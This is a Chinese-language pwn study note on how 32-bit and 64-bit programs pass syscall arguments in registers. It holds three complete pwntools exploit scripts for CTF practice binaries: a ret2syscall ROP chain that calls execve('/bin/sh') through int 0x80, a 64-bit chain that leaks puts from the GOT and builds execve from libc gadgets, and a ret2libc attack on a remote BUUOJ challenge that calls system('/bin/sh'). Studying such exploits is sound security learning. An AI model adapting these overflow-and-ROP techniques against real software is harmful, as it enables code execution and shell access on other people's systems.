主要还是要学习32位程序和64位程序函数参数的不同寄存器处理
https://tearorca.github.io/32位和64位在pwn中的不同点/
系统调用syscall
灵感来源:https://bbs.pediy.com/thread-248682.htm
使用的程序为网页中的pwn2，pwn2中有大量的gadget，不需要ret2libc

"""ret2syscall against ./pwn2 (32-bit): pop gadgets load execve's register
arguments and an ``int 0x80`` gadget issues the syscall."""
from pwn import *

context.log_level = 'DEBUG'

p = process('./pwn2')
elf = ELF('./pwn2')


def get_addr(s):
    """Return the first address in ./pwn2 where the byte string *s* occurs."""
    matches = elf.search(s)
    return next(matches)


# Drain whatever the program prints before it reads our input.
p.recv()

# Gadget and string addresses inside ./pwn2 (specific to this binary).
pop_eax = 0x080bb196
pop_ecx_ebx = 0x0806eb91
pop_edx = 0x0806eb6a
int80 = 0x08049421
binsh = 0x080be408

# Return chain after 112 bytes of filler:
#   eax = 0xb (execve), then pop_ecx_ebx (ecx first, per its name) takes 0 and
#   the /bin/sh address, edx = 0, and finally the int 0x80 gadget.
chain = [pop_eax, 0xb, pop_ecx_ebx, 0, binsh, pop_edx, 0, int80]
payload = 'a' * 112 + ''.join(map(p32, chain))

p.sendline(payload)
p.interactive()
利用syscall函数
"""Two-stage chain against ./rop (64-bit): leak puts via the GOT, derive the
libc base, then run execve through gadgets found inside libc."""
from pwn import *
from LibcSearcher import *
import code

context.log_level = 'DEBUG'

p = process('./rop')
elf = ELF('./rop')


def pack_chain(words):
    """Pack a list of 64-bit words into the raw bytes of a return-address chain."""
    return ''.join(map(p64, words))


# Binary-side gadget plus the puts GOT/PLT slots and main (all taken from ./rop).
pop_rdi = 0x4011bb
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']

p.recv()

# Stage 1: puts(puts@got) prints the runtime address of puts, then return to main
# so the program reads a second input.
leak_chain = [pop_rdi, puts_got, puts_plt, main]
p.sendline('a' * 18 + pack_chain(leak_chain))

# Six leaked bytes are zero-extended to a full 8-byte word
# (assumes the top two bytes of the address are zero — confirm against the output).
puts_libc = u64(p.recv(6).ljust(8, '\x00'))
print(hex(puts_libc))
p.recv()

# libc base from the leak, using the libc pwntools resolves for this binary.
libc = elf.libc
libc_base = puts_libc - libc.symbols['puts']

# Gadget offsets inside that libc; these replace the usual system() call.
pop_rax = libc_base + 0x3ee28
pop_rdi = libc_base + 0x26796
pop_rsi = libc_base + 0x2890f
pop_rdx = libc_base + 0xcb16d
syscall = libc_base + 0x2552b
binsh = libc_base + next(libc.search('/bin/sh'))

# Stage 2: rax = 59 (execve), rdi = /bin/sh, rsi = 0, rdx = 0, then the syscall gadget.
exec_chain = [pop_rax, 59, pop_rdi, binsh, pop_rsi, 0, pop_rdx, 0, syscall]
p.sendline('a' * 18 + pack_chain(exec_chain))
p.interactive()
利用system函数
"""ret2libc against the remote rop service: leak puts, identify libc with
LibcSearcher, then return into system("/bin/sh")."""
from pwn import *
from LibcSearcher import *
import sys
import code

context.log_level = 'DEBUG'

# Python 2 only: reset the process-wide default string encoding.
reload(sys)
sys.setdefaultencoding("utf-8")

p = remote('node4.buuoj.cn', 27296)
elf = ELF('rop')


def pack_chain(words):
    """Pack a list of 64-bit words into the raw bytes of a return-address chain."""
    return ''.join(map(p64, words))


# Bytes of filler before the chain; specific to this binary.
padding_len = 0x28

# Gadget in the binary plus the puts GOT/PLT slots and main, used for the leak.
pop_rdi = 0x400733
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = elf.symbols['main']

p.recv()

# Stage 1: puts(puts@got) leaks the libc address of puts; return to main for a second input.
p.sendline('a' * padding_len + pack_chain([pop_rdi, puts_got, puts_plt, main]))

# Six leaked bytes, zero-extended to a 64-bit word
# (assumes the top two bytes of the address are zero — confirm against the output).
puts_libc = u64(p.recv(6).ljust(8, '\x00'))
print(hex(puts_libc))
p.recv()

# Match the remote libc by the puts address, then derive base, system and "/bin/sh".
libc = LibcSearcher('puts', puts_libc)
libcbase_addr = puts_libc - libc.dump('puts')
system_addr = libcbase_addr + libc.dump('system')
binsh_addr = libcbase_addr + libc.dump('str_bin_sh')

# Stage 2: rdi = "/bin/sh", then call system.
p.sendline('a' * padding_len + pack_chain([pop_rdi, binsh_addr, system_addr]))
p.interactive()